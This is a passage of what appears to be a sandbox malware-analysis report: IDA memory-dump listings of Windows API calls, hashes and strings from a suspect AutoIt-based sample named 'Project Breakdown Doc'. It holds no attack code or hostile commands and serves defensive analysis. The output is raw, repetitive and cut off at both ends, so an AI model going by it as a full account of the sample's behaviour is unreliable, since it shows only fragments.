                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: 34f29e23eff1deef06a0e6a64f9d30d4cb0472f32882e14a874c65bb3f91522d
                                                  • Instruction ID: 19d8add34bbb6e20d54311a84c57982cb6f8b6a609a9e66d23f0c0609e758097
                                                  • Opcode Fuzzy Hash: 34f29e23eff1deef06a0e6a64f9d30d4cb0472f32882e14a874c65bb3f91522d
                                                  • Instruction Fuzzy Hash: E84115B5A04609AFDB20DF54D885F9ABBF9FB08310F048229F92597690D730AE51CFA0
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00CC125C
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC1286
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00CC133D
                                                    • Part of subcall function 00CC122D: RegCloseKey.ADVAPI32(?), ref: 00CC12A3
                                                    • Part of subcall function 00CC122D: FreeLibrary.KERNEL32(?), ref: 00CC12F5
                                                    • Part of subcall function 00CC122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CC1318
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CC12E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 42f419dd7fcbcb402fd61e6a32ce499da7e3986fc63a410dac7c85417d5e261f
                                                  • Instruction ID: 6fd4b826ca938c4c4b3cda7b8e8df09cba2f7e196411f706b4033f1790ed7f5c
                                                  • Opcode Fuzzy Hash: 42f419dd7fcbcb402fd61e6a32ce499da7e3986fc63a410dac7c85417d5e261f
                                                  • Instruction Fuzzy Hash: 76314BB1901109BFDB14DB91DC89FFEBBBCEF09304F04416DE912E2152EA749F469AA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CC655B
                                                  • GetWindowLongW.USER32(017A55B0,000000F0), ref: 00CC658E
                                                  • GetWindowLongW.USER32(017A55B0,000000F0), ref: 00CC65C3
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CC65F5
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CC661F
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00CC6630
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CC664A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: cb159b60e0276752d6cdf087bceb7d5482976276c6484e2048b40cb51254699e
                                                  • Instruction ID: d3adf0c3e275df0a8c78d58f1122956d56979fc2ee96382e70ed332a7233237b
                                                  • Opcode Fuzzy Hash: cb159b60e0276752d6cdf087bceb7d5482976276c6484e2048b40cb51254699e
                                                  • Instruction Fuzzy Hash: 24310230604211AFDB21CF18DE84F693BE1FB4A714F2841A8F525CB2B6CB71E991DB51
                                                  APIs
                                                    • Part of subcall function 00CB80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CB80CB
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CB64D9
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB64E8
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CB6521
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00CB652A
                                                  • WSAGetLastError.WSOCK32 ref: 00CB6534
                                                  • closesocket.WSOCK32(00000000), ref: 00CB655D
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CB6576
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: 8f7ea5432215ca289655654ffffddfeda72659f71ca60de23f5ef3b68cfaa95c
                                                  • Instruction ID: 39d70b9254247776cd5c4ff7809aac38ec90ae6576d68495bf8a48f90d211934
                                                  • Opcode Fuzzy Hash: 8f7ea5432215ca289655654ffffddfeda72659f71ca60de23f5ef3b68cfaa95c
                                                  • Instruction Fuzzy Hash: ED31B131600218AFDB10AF24CC85FFE7BADEB45714F008069F91997291CB74AD09DBA1
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9E0FA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9E120
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C9E123
                                                  • SysAllocString.OLEAUT32 ref: 00C9E144
                                                  • SysFreeString.OLEAUT32 ref: 00C9E14D
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C9E167
                                                  • SysAllocString.OLEAUT32(?), ref: 00C9E175
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 9c38f87d5460c3a8a7c964ae16e35594fd5d0a5010d0be100e9c6caa5e6202fa
                                                  • Instruction ID: 16e9c2a7186233f3b9df867c3926d3b200c58eca516f969a9bb72172f4c5a9d5
                                                  • Opcode Fuzzy Hash: 9c38f87d5460c3a8a7c964ae16e35594fd5d0a5010d0be100e9c6caa5e6202fa
                                                  • Instruction Fuzzy Hash: D121A131600208AFDF10DFA9DC88EAF77EDEB19760B108129F915CB2A1DA71DD41CB60
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 1038674560-2734436370
                                                  • Opcode ID: 8c63b5e60a8d64ae6365b32bdf23311fa623bd7da1dbd48124f393b3b2f6ab8f
                                                  • Instruction ID: 450a21d0bfa2c62c31d0af385c1e73236c4bd5b5e65ee38eb2650c3621e4dddd
                                                  • Opcode Fuzzy Hash: 8c63b5e60a8d64ae6365b32bdf23311fa623bd7da1dbd48124f393b3b2f6ab8f
                                                  • Instruction Fuzzy Hash: 2C213A3220425167DB30AA24DC16EA773D8EF51354F14803EF995C7141E7919A83E295
                                                  APIs
                                                    • Part of subcall function 00C41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C41D73
                                                    • Part of subcall function 00C41D35: GetStockObject.GDI32(00000011), ref: 00C41D87
                                                    • Part of subcall function 00C41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C41D91
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CC78A1
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CC78AE
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CC78B9
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CC78C8
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CC78D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: cff936a5f54d87c074ef58a251e7dd1435ef0c53ee3c6d7b8b8a8cf5255d0048
                                                  • Instruction ID: 88fe1fd2dd4f2350a952813fb7c1d98c4e95b9784e6838ba9cbd4e9f39e9969e
                                                  • Opcode Fuzzy Hash: cff936a5f54d87c074ef58a251e7dd1435ef0c53ee3c6d7b8b8a8cf5255d0048
                                                  • Instruction Fuzzy Hash: 59118EB2510219BEEF159F60CC85EEB7F6DEF08758F014219FB04A6090C772AC21DBA0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C64292,?), ref: 00C641E3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00C641EA
                                                  • EncodePointer.KERNEL32(00000000), ref: 00C641F6
                                                  • DecodePointer.KERNEL32(00000001,00C64292,?), ref: 00C64213
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoInitialize$combase.dll
                                                  • API String ID: 3489934621-340411864
                                                  • Opcode ID: 313c3e22705952b69f6aceb0c3ad12152aaa81071ad00d843c600fc6af011c3e
                                                  • Instruction ID: b00d7ab51bdf1666019b77edf3241d609d14eaacae32d108b112dcb3b467e7dc
                                                  • Opcode Fuzzy Hash: 313c3e22705952b69f6aceb0c3ad12152aaa81071ad00d843c600fc6af011c3e
                                                  • Instruction Fuzzy Hash: F9E01AF0E90340AEEB206BB0EC49F0C3AA6B761B02F108438F625D52B0DBB54096CF11
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C641B8), ref: 00C642B8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00C642BF
                                                  • EncodePointer.KERNEL32(00000000), ref: 00C642CA
                                                  • DecodePointer.KERNEL32(00C641B8), ref: 00C642E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 6cbfc00febc04bc59be696b632ead41addc5b5988413695f4dc7afaee481a7f8
                                                  • Instruction ID: 86d88fabfa62023ca96d96f95a37e0713fe311a09469f011314cd5124d22c914
                                                  • Opcode Fuzzy Hash: 6cbfc00febc04bc59be696b632ead41addc5b5988413695f4dc7afaee481a7f8
                                                  • Instruction Fuzzy Hash: 4BE0ECBC581300EFEB209F61EC0DF0A3AA6B724742F244039F215E12B0CBB48586CB25
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: cb1dd912e883e8d9c29446e36cc817b48adc01cf96968c0a1b7864e8d4a650fe
                                                  • Instruction ID: 928343d2baf2ffdaa87a5a1555e5a056b91e2c518684bc4e8f752c7d8bc53661
                                                  • Opcode Fuzzy Hash: cb1dd912e883e8d9c29446e36cc817b48adc01cf96968c0a1b7864e8d4a650fe
                                                  • Instruction Fuzzy Hash: E961AB3050465A9BCF21EF60CC82EFF37A8FF45308F084519F85A6B292DB34A941EB90
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00CC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC0038,?,?), ref: 00CC10BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0548
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC0588
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CC05AB
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CC05D4
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CC0617
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00CC0624
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: a1500efb94ce493489311531fedd4a29272db41b4ad1c16cdafb97266db11b5e
                                                  • Instruction ID: 4162e6e6232ce53ce4e4ebc23ad5f893ae6965d3bcc0806b5aa74070c8f5b000
                                                  • Opcode Fuzzy Hash: a1500efb94ce493489311531fedd4a29272db41b4ad1c16cdafb97266db11b5e
                                                  • Instruction Fuzzy Hash: B4513831108200AFCB14EF64C885E6FBBE9FF85714F14491DF995972A2DB31EA05EB52
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00CC5A82
                                                  • GetMenuItemCount.USER32(00000000), ref: 00CC5AB9
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CC5AE1
                                                  • GetMenuItemID.USER32(?,?), ref: 00CC5B50
                                                  • GetSubMenu.USER32(?,?), ref: 00CC5B5E
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CC5BAF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: c82156f2775541129bad8ec1aac252fcf82ef305e31e1513fef78ff1ec1355ef
                                                  • Instruction ID: 7c756cb4e8d8a22ba761f5e8bf1ef9090d6127cf6d2a0f84ef1808d2f5cf82da
                                                  • Opcode Fuzzy Hash: c82156f2775541129bad8ec1aac252fcf82ef305e31e1513fef78ff1ec1355ef
                                                  • Instruction Fuzzy Hash: 98517C31A00615AFCF11EFA5C895EAEBBB5EF48310F144469F816B7351CB70BE81AB90
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C9F3F7
                                                  • VariantClear.OLEAUT32(00000013), ref: 00C9F469
                                                  • VariantClear.OLEAUT32(00000000), ref: 00C9F4C4
                                                  • _memmove.LIBCMT ref: 00C9F4EE
                                                  • VariantClear.OLEAUT32(?), ref: 00C9F53B
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C9F569
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: 8863d096aaf944d3bf06a999d8cad09ad5c3cafec054436fc3f6afe1731ac7a5
                                                  • Instruction ID: 459ebf8185127905df4c512969173b92c218feab7a94bc59154a422a90478c9c
                                                  • Opcode Fuzzy Hash: 8863d096aaf944d3bf06a999d8cad09ad5c3cafec054436fc3f6afe1731ac7a5
                                                  • Instruction Fuzzy Hash: ED515AB5A00209EFCB14CF58D884EAAB7B9FF48314B15816EE959DB310D730E952CBA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2747
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA2792
                                                  • IsMenu.USER32(00000000), ref: 00CA27B2
                                                  • CreatePopupMenu.USER32 ref: 00CA27E6
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00CA2844
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CA2875
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: 7603fcca429ca8a551c6e1f09ab75bfbc8b6dc506624b76d2bcf7dfba546bd8c
                                                  • Instruction ID: a68cec5b23193dfc72ce286d40c1ef3e2fdca58273eb1f271405fc203f5df2b1
                                                  • Opcode Fuzzy Hash: 7603fcca429ca8a551c6e1f09ab75bfbc8b6dc506624b76d2bcf7dfba546bd8c
                                                  • Instruction Fuzzy Hash: AD519E71A00226DBDF24CF6CD988BAEBBF5AF46318F104169F8219B2D1D7748A04CB51
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C4179A
                                                  • GetWindowRect.USER32(?,?), ref: 00C417FE
                                                  • ScreenToClient.USER32(?,?), ref: 00C4181B
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C4182C
                                                  • EndPaint.USER32(?,?), ref: 00C41876
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: d2aae76f4d6c090e2679cee5993bbd9f1dc304fe0cb70b071a5cc9c75a57b5cc
                                                  • Instruction ID: 15c70be12e92086d4cda818b11e836cfc5e6fef25312d035fa3ed0483fc85a52
                                                  • Opcode Fuzzy Hash: d2aae76f4d6c090e2679cee5993bbd9f1dc304fe0cb70b071a5cc9c75a57b5cc
                                                  • Instruction Fuzzy Hash: D6417B70104301AFD711DF25C884FBA7BE9FB49724F184629FAA8C62E1C731D985EB61
                                                  APIs
                                                  • ShowWindow.USER32(00D067B0,00000000,017A55B0,?,?,00D067B0,?,00CCB862,?,?), ref: 00CCB9CC
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00CCB9F0
                                                  • ShowWindow.USER32(00D067B0,00000000,017A55B0,?,?,00D067B0,?,00CCB862,?,?), ref: 00CCBA50
                                                  • ShowWindow.USER32(00000000,00000004,?,00CCB862,?,?), ref: 00CCBA62
                                                  • EnableWindow.USER32(00000000,00000001), ref: 00CCBA86
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CCBAA9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 38526cea1d8a0c1d19e3ef786ab1a995bd0ea56ea8a69af38c55cb0b63ab8d4b
                                                  • Instruction ID: 28f218f2fffdfe133d34d30bf2845edbd08b19688e0f988ec43264fe08855f80
                                                  • Opcode Fuzzy Hash: 38526cea1d8a0c1d19e3ef786ab1a995bd0ea56ea8a69af38c55cb0b63ab8d4b
